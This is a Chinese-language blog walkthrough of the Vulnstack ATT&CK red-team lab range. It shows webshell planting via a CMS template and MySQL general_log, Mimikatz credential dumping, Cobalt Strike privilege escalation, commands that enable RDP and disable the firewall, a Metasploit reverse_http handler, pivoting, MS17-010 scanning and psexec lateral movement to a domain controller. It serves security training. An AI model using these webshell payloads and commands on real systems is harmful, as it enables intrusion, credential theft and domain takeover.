ATT&CK红队评估实战靶场(一)

发表于 |

环境搭建

环境下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

注:虚拟机所有统一密码:hongrisec@2019

新建一个网卡vmnetX(比如vmnet2),仅主机模式,ip网段是192.168.52.0/24

win7设置两个网卡,一个仅主机模式(vmnetX),另一个NAT或者桥接

win2003和2008都是(vmnetX)

环境连通性测试,win7 ping一下138和141,

靶机:
win7 外网ip:192.168.X.X(我这是232.129) 内网ip:192.168.52.143
win03 ip: 192.168.52.141
win08 ip: 192.168.52.138

进入win7的C盘的phpstudy,开启web服务即可

渗透

端口扫描


80端口访问是phpstudy的探针

接下来进行目录扫描


可以看到这里有备份文件,phpinfo和phpmyadmin

下载备份文件,解压后是一个yxcms的目录,里面robots.txt的内容如下

1
2
3
4
5
6
#
# robots.txt for YXCMS
#
User-agent: * 
Disallow: /data
Disallow: /protected

在目录data\db_back\1384692844\1384692844_part0.sql.php的文件,里面看着是sql备份文件

1
2
3
4
5
6
7
8
9
10
<?php exit;?>DROP TABLE IF EXISTS yx_admin
CREATE TABLE `yx_admin` (  `id` int(10) unsigned NOT NULL auto_increment,  `groupid` tinyint(4) NOT NULL default '1',  `username` char(10) NOT NULL,  `realname` char(15) NOT NULL,  `password` char(32) NOT NULL,  `lastlogin_time` int(10) unsigned NOT NULL,  `lastlogin_ip` char(15) NOT NULL,  `iflock` tinyint(1) unsigned NOT NULL default '0',  `sortpower` text NOT NULL,  `extendpower` varchar(100) NOT NULL,  PRIMARY KEY  (`id`),  UNIQUE KEY `usename` (`username`),  KEY `groupid` (`groupid`)) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='管理员信息表';
INSERT INTO yx_admin VALUES('1','1','admin','YX','168a73655bfecefdb15b14984dd2ad60','1384692085','127.0.0.1','0','','')
DROP TABLE IF EXISTS yx_extend
CREATE TABLE `yx_extend` (  `id` int(10) NOT NULL auto_increment,  `pid` int(10) default '0',  `tableinfo` varchar(255) default NULL,  `type` int(4) default '0',  `defvalue` varchar(255) default NULL,  `name` varchar(255) default NULL,  `norder` int(5) NOT NULL default '0',  `ifsearch` tinyint(1) NOT NULL,  PRIMARY KEY  (`id`)) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8;
INSERT INTO yx_extend VALUES('1','0','extend_product','0','','产品拓展','0','0')
INSERT INTO yx_extend VALUES('2','1','stand','1','未知','产品型号','0','0')
.................
.................
.................

那个密码md5解密后是949ba59abbe56e05,感觉挺长的。。。,不知道对不对

使用这个登录好像不对,首页有个公告,这个就可以直接登录进去了

1
本站为YXcms的默认演示模板,YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。

根据备份文件,模板目录在yxcms\protected\apps\default\view\default

新建一句话木马模板,webshell连接(实际访问http://192.168.232.129/yxcms/protected/apps/default/view/default/ ,发现还有列目录的漏洞)

数据库那个是root/root的弱密码,试试能不能直接写文件

1
SELECT '<?php @eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/WWW/test.php'

报错:

1
#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

这个我们可以查询全家变量

1
SHOW GLOBAL VARIABLES LIKE '%secure%'

可以看到secure_file_priv的值为NULL,所以无法写入,而且是只读的,无法更改

另外可以尝试写日志

这里默认是关的,我们打开

1
2
SET GLOBAL general_log = ON
SET GLOBAL general_log_file = 'C:/phpStudy/WWW/666.php'

再执行Select '<?php @eval($_POST[666]);?>'查询语句,接下来webshell连接即可

主机信息收集

执行虚拟终端,用户名是administrator,还有一个内网ip:192.168.52.143


系统及补丁信息(可以看到系统类型: x64-based PC)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
C:\phpStudy\WWW> systeminfo
主机名:           STU1
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          成员工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00371-177-0000061-85693
初始安装日期:     2019/8/25, 9:54:10
系统启动时间:     2024/8/20, 14:53:01
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: AMD64 Family 25 Model 80 Stepping 0 AuthenticAMD ~3194 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,258 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,213 MB
虚拟内存: 使用中: 882 MB
页面文件位置:     C:\pagefile.sys
域:               god.org
登录服务器:       \\OWA
修补程序:         安装了 4 个修补程序。
                  [01]: KB2534111
                  [02]: KB2999226
                  [03]: KB958488
                  [04]: KB976902
网卡:             安装了 5 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.52.143
                        [02]: fe80::15ce:507f:6840:5c62
                  [02]: TAP-Windows Adapter V9
                      连接名:      本地连接 2
                      状态:        媒体连接已中断
                  [03]: Microsoft Loopback Adapter
                      连接名:      Npcap Loopback Adapter
                      启用 DHCP:   是
                      DHCP 服务器: 255.255.255.255
                      IP 地址
                        [01]: 169.254.129.186
                        [02]: fe80::b461:ccad:e30f:81ba
                  [04]: TAP-Windows Adapter V9
                      连接名:      本地连接 3
                      状态:        媒体连接已中断
                  [05]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接 5
                      启用 DHCP:   是
                      DHCP 服务器: 192.168.232.254
                      IP 地址
                        [01]: 192.168.232.129
                        [02]: fe80::ed80:3750:5fdb:1c0d

cs上线


运行Mimikatz即可获得密码


直接右键elevate提权

Cobalt Strike 中的 elevate 命令用于提升权限,其中 svc-exe 是其中一种提权方法。svc-exe 提权方法的基本原理是利用 Windows 服务的一个特性:如果一个服务是以 SYSTEM 权限运行的,那么利用该服务启动的程序也将以 SYSTEM 权限运行。以下是 svc-exe 提权的一般步骤和原理:

  1. 创建一个以 SYSTEM 权限启动的程序:这个程序的作用是连接指定的命名管道。
  2. 创建一个进程:该进程创建一个命名管道。
  3. 利用管道进行交互:让以 SYSTEM 权限启动的程序启动并连接这个命名管道。
  4. 利用 ImpersonateNamedPipeClient 函数:生成 SYSTEM 权限的 token。
  5. 利用 SYSTEM 权限的 token 启动程序:例如启动 cmd.exe,从而获得一个 SYSTEM 权限的 shell。

在 Cobalt Strike 中使用 svc-exe 提权时,会在目标机上生成一个基于服务自启动的 exe 程序,该程序响应 Service Control Manager 命令。提权成功后,会通过 SYSTEM 权限回连指定的监听器,并在 Cobalt Strike 服务端新生成一个会话 。

需要注意的是,svc-exe 提权方法需要在已经获取的会话中执行,并且该会话需要有一定的权限来创建服务和写入文件。此外,这种方法可能需要目标系统上存在特定的服务配置或漏洞,以便成功执行提权操作。如果目标系统已经打过补丁或配置得当,这种方法可能不会成功。

ipconfig /all可以看到域是god.org


net config workstation查看当前的计算机名,用户名,系统版本,域等信息

net view /domain 查看域的情况(有时候有多个域),只有一个GOD


cs域成员查询,并确认域控(PDC:主域控制器,运行 windows NT server 负责验证域登录和维护域目录数据库的计算机),不过cs的ip地址显示不正确的。


开3389

1
2
3
4
5
6
7
注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

fscan内网扫描


详细扫描结果如下:

可以看到143是有MS17-010漏洞的,提权就可以用这个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
192.168.52.138:80 open
192.168.52.141:21 open
192.168.52.141:135 open
192.168.52.143:135 open
192.168.52.1:135 open
192.168.52.138:135 open
192.168.52.143:80 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.141:445 open
192.168.52.143:445 open
192.168.52.1:445 open
192.168.52.138:445 open
192.168.52.141:139 open
192.168.52.143:139 open
192.168.52.1:139 open
192.168.52.138:139 open
192.168.52.138:88 open
192.168.52.141:7002 open
192.168.52.1:8088 open
192.168.52.1:8161 open
192.168.52.141:8099 open
192.168.52.141:8098 open
192.168.52.1:8099 open
192.168.52.1:8098 open
192.168.52.1:8834 open
[+] 192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]192.168.52.143
   [->]169.254.129.186
   [->]192.168.232.129
[*] 192.168.52.143       GOD\STU1              Windows 7 Professional 7601 Service Pack 1
[*] 192.168.52.141       __MSBROWSE__\SNTL_ROOT-TVI86   
[+] NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
[+] NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
[+] NetInfo:
[*]192.168.52.1
   [->]LAPTOP-QLSFIGJ9
   [->]192.168.232.1
   [->]192.168.108.1
   [->]192.168.52.1
   [->]192.168.1.227
   [->]fdd7:e884:25e6:0:a568:4b3d:d112:3b74
   [->]fdd7:e884:25e6:0:f4f2:819e:993f:1aab
[*] 192.168.52.1         WORKGROUP\LAPTOP-QLSFIGJ9   
[*] WebTitle:http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[+] 192.168.52.141	MS17-010	(Windows Server 2003 3790)
[*] WebTitle:https://192.168.52.1:8834 code:200 len:1629   title:Nessus
[*] WebTitle:http://192.168.52.1:8161  code:302 len:0      title:None 跳转url: http://192.168.52.1:8161/index.html
[*] 192.168.52.138 [+]DC GOD\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[+] 192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] WebTitle:http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[*] WebTitle:https://192.168.52.141:8098 code:401 len:1656   title:You are not authorized to view this page
[*] WebTitle:http://192.168.52.1:8161/index.html code:200 len:6180   title:Apache ActiveMQ
[+] InfoScan:http://192.168.52.1:8161/index.html [activemq] 
[*] WebTitle:http://192.168.52.138     code:200 len:689    title:IIS7
[*] WebTitle:https://192.168.52.1:8088 code:200 len:14     title:None
[*] WebTitle:http://192.168.52.143     code:200 len:14749  title:phpStudy 探针 2014
[+] ftp://192.168.52.141:21:anonymous 
[*] WebTitle:http://192.168.52.1:8099  code:403 len:48     title:None
[+] http://192.168.52.1:8161 poc-yaml-activemq-default-password

使用Ladon也行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
[08/26 14:15:03] [*] Ladon 192.168.52.1/24 OnlineIP
[08/26 14:15:04] [+] host called home, sent: 496219 bytes
[08/26 14:15:05] [+] received output:
Ladon 9.1.1
Start: 2024-08-26 14:15:05
Runtime: .net 4.0  ME: x64 OS: x64
OS Name: Microsoft Windows 7 专业版 
Machine Make: VMware, Inc.
RunUser: Administrator PR: *IsAdmin
Priv: SeImpersonatePrivilege 已启用
PID: 2452  CurrentProcess: rundll32
FreeSpace: Disk C:\ 6563 MB

load OnlineIP
192.168.52.1/24 is Valid CIDR
IPCound: 256
Scan Start: 2024-08-26 14:15:05
192.168.52.1

[08/26 14:15:28] [+] received output:
192.168.52.138
192.168.52.141
192.168.52.143

[08/26 14:16:04] [+] received output:
=============================================
OnlinePC:4
Cidr Scan Finished!
End: 2024-08-26 14:16:04

OSScan功能能扫描到系统版本,还有是否虚拟机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[08/26 14:20:16] [*] Tasked beacon to run .NET program: Ladon.exe 192.168.52.0/24 OSScan
[08/26 14:20:21] [+] host called home, sent: 1036887 bytes
[08/26 14:20:22] [+] received output:
Ladon 7.5
Start: 2024-08-26 14:20:22
Runtime: .net 4.0  ME: x64 OS: x64
OS Name: Microsoft Windows 7 专业版 
RunUser: SYSTEM PR: *IsSystem
Priv: SeImpersonatePrivilege 已启用
PID: 2312  CurrentProcess: rundll32

load OsScan
IP	Mac	Domain/HostName	OSversion/Service	Vendor
192.168.52.0/24 is Valid CIDR
IPCound: 256
Scan Start: 2024-08-26 14:20:22

[08/26 14:20:31] [+] received output:
192.168.52.1	00-50-56-C0-00-02	WORKGROUP\LAPTOP-QLSFIGJ9	[Win Netbios Name]	VMware

[08/26 14:20:40] [+] received output:
192.168.52.143 	00-0C-29-B4-9F-EF	god.org\STU1   	[Win 7 Professional 7601 SP 1]	VMware
192.168.52.138 	00-0C-29-2C-84-78	god.org\OWA    	[Win 2008 R2 Datacenter 7601 SP 1]	VMware
192.168.52.141 	00-0C-29-23-21-64	god.org\ROOT-TVI862UBEH	[Win 2003 3790]	VMware

msf联动

新建一个windows/foreign/reverse_http的监听

msf输入

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 9999
exploit

cs新建会话,选择msf的监听器

添加路由

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > run post/multi/manage/autoroute 

[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.232.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.52.0       255.255.255.0      Session 1
   192.168.232.0      255.255.255.0      Session 1

arp主机存活扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
msf6 exploit(multi/handler) > use post/windows/gather/arp_scanner 
msf6 post(windows/gather/arp_scanner) > show options 

Module options (post/windows/gather/arp_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   SESSION                   yes       The session to run this module on
   THREADS  10               no        The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 post(windows/gather/arp_scanner) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ STU1  192.168.232.130:9999 -> 192.168.2
                                                                 32.129:62110 (192.168.232.129)

msf6 post(windows/gather/arp_scanner) > set session 1
session => 1
msf6 post(windows/gather/arp_scanner) > set RHOSTS 192.168.52.1/24
RHOSTS => 192.168.52.1/24
msf6 post(windows/gather/arp_scanner) > run

[*] Running module against STU1
[*] ARP Scanning 192.168.52.1/24
[+] 	IP: 192.168.52.1 MAC 00:50:56:c0:00:02 (VMware, Inc.)
[+] 	IP: 192.168.52.138 MAC 00:0c:29:2c:84:78 (VMware, Inc.)
[+] 	IP: 192.168.52.143 MAC 00:0c:29:b4:9f:ef (VMware, Inc.)
[+] 	IP: 192.168.52.141 MAC 00:0c:29:23:21:64 (VMware, Inc.)
[+] 	IP: 192.168.52.255 MAC 00:0c:29:b4:9f:ef (VMware, Inc.)
[+] 	IP: 192.168.52.254 MAC 00:50:56:e7:ae:61 (VMware, Inc.)
[*] Post module execution completed

udp主机存活扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf6 post(windows/gather/arp_scanner) > use auxiliary/scanner/discovery/udp_sweep
msf6 auxiliary(scanner/discovery/udp_sweep) > show options 

Module options (auxiliary/scanner/discovery/udp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/
                                         using-metasploit/basics/using-metasploit.html
   THREADS    10               yes       The number of concurrent threads


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.52.1/24
RHOSTS => 192.168.52.1/24
msf6 auxiliary(scanner/discovery/udp_sweep) > run

[*] Sending 13 probes to 192.168.52.0->192.168.52.255 (256 hosts)
[*] Discovered NetBIOS on 192.168.52.1:137 (LAPTOP-QLSFIGJ9:<20>:U :WORKGROUP:<00>:G :LAPTOP-QLSFIGJ9:<00>:U :00:50:56:c0:00:02)
[*] Discovered NetBIOS on 192.168.52.138:137 (OWA:<00>:U :GOD:<00>:G :GOD:<1c>:G :OWA:<20>:U :GOD:<1b>:U :00:0c:29:2c:84:78)
[*] Discovered DNS on 192.168.52.138:53 (Microsoft DNS)
[*] Discovered NTP on 192.168.52.138:123 (1c0104fa00000000000a16cf4c4f434cea77a7f77836778bc54f234b71b152f3ea77c0c61d552fddea77c0c61d552fdd)
[*] Discovered NetBIOS on 192.168.52.141:137 (ROOT-TVI862UBEH:<00>:U :GOD:<00>:G :SNTL_ROOT-TVI86:<32>:U :ROOT-TVI862UBEH:<20>:U :GOD:<1e>:G :GOD:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:23:21:64)
[*] Discovered NetBIOS on 192.168.52.143:137 (STU1:<00>:U :GOD:<00>:G :STU1:<20>:U :00:0c:29:b4:9f:ef)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

使用msf开启代理

1
2
use auxiliary/server/socks_proxy
run

修改/etc/proxychains4.conf

1
2
3
4
5
6
7
8
9
10
└─$ tail /etc/proxychains4.conf 
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 	127.0.0.1 1080

使用nmap扫描,另外的52.141就不贴了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
$ proxychains nmap -T4 -A -v -Pn 192.168.52.138
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 23:12 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:12
Completed NSE at 23:12, 0.00s elapsed
Initiating NSE at 23:12
Completed NSE at 23:12, 0.00s elapsed
Initiating NSE at 23:12
Completed NSE at 23:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:12
Completed Parallel DNS resolution of 1 host. at 23:12, 0.01s elapsed
Initiating SYN Stealth Scan at 23:12
Scanning 192.168.52.138 [1000 ports]
Discovered open port 135/tcp on 192.168.52.138
Discovered open port 53/tcp on 192.168.52.138
Discovered open port 80/tcp on 192.168.52.138
Discovered open port 445/tcp on 192.168.52.138
Discovered open port 139/tcp on 192.168.52.138
Discovered open port 49158/tcp on 192.168.52.138
Discovered open port 464/tcp on 192.168.52.138
Discovered open port 88/tcp on 192.168.52.138
Discovered open port 49161/tcp on 192.168.52.138
Discovered open port 49157/tcp on 192.168.52.138
Discovered open port 49167/tcp on 192.168.52.138
Discovered open port 3268/tcp on 192.168.52.138
Discovered open port 389/tcp on 192.168.52.138
Discovered open port 593/tcp on 192.168.52.138
Discovered open port 3269/tcp on 192.168.52.138
Completed SYN Stealth Scan at 23:12, 4.47s elapsed (1000 total ports)
Initiating Service scan at 23:12
Scanning 15 services on 192.168.52.138
Completed Service scan at 23:12, 5.01s elapsed (15 services on 1 host)
Initiating OS detection (try #1) against 192.168.52.138
Retrying OS detection (try #2) against 192.168.52.138
Initiating Traceroute at 23:12
Completed Traceroute at 23:12, 9.10s elapsed
NSE: Script scanning 192.168.52.138.
Initiating NSE at 23:12
Completed NSE at 23:13, 27.96s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.55s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Nmap scan report for 192.168.52.138
Host is up (0.0011s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
53/tcp    open  tcpwrapped
80/tcp    open  tcpwrapped
|_http-server-header: Microsoft-IIS/7.5
88/tcp    open  tcpwrapped
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped
389/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
464/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped
3268/tcp  open  tcpwrapped
3269/tcp  open  tcpwrapped
49157/tcp open  tcpwrapped
49158/tcp open  tcpwrapped
49161/tcp open  tcpwrapped
49167/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 135/tcp)
HOP RTT    ADDRESS
1   ... 30

NSE: Script Post-scanning.
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Initiating NSE at 23:13
Completed NSE at 23:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.63 seconds
           Raw packets sent: 2223 (103.828KB) | Rcvd: 2402 (114.170KB)

445端口开了可以尝试ms17-010永恒之蓝,当然也可以扫描一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf6 auxiliary(scanner/smb/smb_ms17_010) > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.52.138
RHOST => 192.168.52.138
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.52.138:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.52.138:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.52.141
RHOST => 192.168.52.141
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.52.141:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] 192.168.52.141:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以使用admin/smb/ms17_010_command模块直接执行命令,永恒之蓝那个模块只支持64位版本系统

CS横向移动

52.141通过psexec获取

而 52.138通过psexec_psh获取到权限

参考

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
https://www.cnblogs.com/yokan/p/14021537.html
https://blog.csdn.net/weixin_39190897/article/details/118353886
https://www.cnblogs.com/1vxyz/p/17201316.html
https://xz.aliyun.com/t/14336
https://www.freebuf.com/column/231111.html

打赏专区
paypal: https://www.paypal.me/giantbranch
假如你看不到评论,可能是你访问Disqus被墙了,请使用代理访问